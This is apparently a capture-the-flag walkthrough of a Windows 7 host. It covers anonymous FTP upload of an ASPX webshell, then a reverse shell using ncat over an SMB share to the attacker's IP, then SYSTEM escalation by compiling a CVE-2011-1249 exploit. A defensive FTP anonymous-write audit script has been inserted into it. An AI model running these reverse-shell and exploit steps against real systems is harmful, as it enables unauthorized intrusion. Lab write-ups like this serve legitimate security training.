Recon & Initial foothold :
We start with running nmap or my preferred method of using AutoRecon to save us some time.
From a quick glance GoBuster wasn’t able to run, so that may be worth re-running manually. For now we can see that two ports are open, 21 and 80, which tells us the host has FTP and HTTP servers running.
Let’s see what’s running on port 80 first. (AutoRecon also takes a screenshot for us; it can be found in the scans directory AutoRecon creates.)
Let’s check out port 21 now. From the nmap scan results we can see that Anonymous login is allowed. The real question is whether we can upload and download data as the Anonymous user.
The file we uploaded is an ASPX webshell that ships with Kali at /usr/share/webshells/aspx/cmdasp.aspx.
Let’s see what happens when we navigate to /cmdasp.aspx.
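The anonymous-upload question above is the one a defender should be answering on their own IIS FTP sites before anyone else does. Below is an added audit check (not from this writeup) that attempts an anonymous login and a harmless marker upload and reports a finding if it succeeds; the connection object is parameterised so the same function runs against a live ftplib session or the constructed StubFtp, which is an assumption used only so the check can run offline.

```python
# Added example (not from the writeup): audit an FTP service for anonymous
# write access, the misconfiguration the walkthrough relies on. The check takes
# any ftplib.FTP-like object, so it runs against a live server or the
# constructed StubFtp below (no network needed).
import io
from ftplib import error_perm

PROBE_NAME = "anon_write_probe.txt"  # harmless marker file, removed afterwards


def anonymous_write_allowed(ftp):
    """Return True if an anonymous session can upload a file (a finding)."""
    try:
        ftp.login("anonymous", "audit@example.invalid")
    except error_perm:
        return False  # anonymous login refused: nothing further to test
    try:
        ftp.storbinary(f"STOR {PROBE_NAME}", io.BytesIO(b"ftp write audit\n"))
    except error_perm:
        return False  # login ok, but the directory is read-only for anonymous
    try:
        ftp.delete(PROBE_NAME)  # clean up; write-but-no-delete is still a finding
    except error_perm:
        pass
    return True


class StubFtp:
    """Constructed stand-in for ftplib.FTP so the check can run offline."""

    def __init__(self, allow_login=True, allow_write=True):
        self.allow_login, self.allow_write, self.files = allow_login, allow_write, {}

    def login(self, user, passwd):
        if not self.allow_login:
            raise error_perm("530 Login incorrect.")

    def storbinary(self, cmd, fp):
        if not self.allow_write:
            raise error_perm("550 Access is denied.")
        self.files[cmd.split(" ", 1)[1]] = fp.read()

    def delete(self, name):
        self.files.pop(name, None)
```

Against a real server, pass a connected ftplib.FTP() instance; StubFtp() and StubFtp(allow_write=False) model the writable and read-only cases so the logic can be exercised without a target.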
Pivot from webshell :
We’re going to access nc.exe over SMB from this webshell so we can grab a proper reverse shell. To do so we’ll go the easy route and use smbserver.py from the Impacket project. I use pipx to manage my Python modules, so in my case I just need to run the following:
sudo smbserver.py <SHARE_NAME> <path to dir with ncat.exe>
Now that we have our SMB server up, let’s use ncat.exe to spawn a shell. First start a listener on your Kali box with the tried and true nc -lvnp <PORT>, and then from the webshell run the following:
\\<KALI_IP>\<SHARE_NAME>\ncat.exe -e cmd.exe <KALI_IP> <PORT>
Let’s find out some more info about the host and see what users exist.
What we’ve learned here is that this is a 32-bit Windows 7 system that appears to have no patches installed.
Sadly we can’t access the Administrator or babis user directories, so we’ll have to escalate our privileges to explore further.
Privilege Escalation :
For this host let’s save the output of systeminfo to a text file on our Kali box and then run WES-NG on that output to find some vulnerabilities we can exploit.
I ran the following to write the findings into a text file I can refer back to without having to scroll around my terminal:
python wes.py <PATH_TO_SYSTEMINFO_FILE> > <OUTPUT_FOLDER_AND_FILE_NAME>
In the case of this host, we’re given a file with ~2500 lines, so we can search it for privilege escalation vulns and do some research on them. There are multiple ways to escalate; however, I liked the simplicity of CVE-2011-1249 here.
Back on the Kali box we’ll need to install a new tool, mingw-w64. Run the following:
sudo apt install mingw-w64
Then download this exploit code or use searchsploit to make a local copy.
Next, in the directory with the exploit code, run the following to create an executable:
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
You know the drill by now: we’re going to run this executable from our SMB share and get SYSTEM privileges in one fell swoop.
Get the flags :
From here we can visit both the Administrator and babis user directories and grab the flags.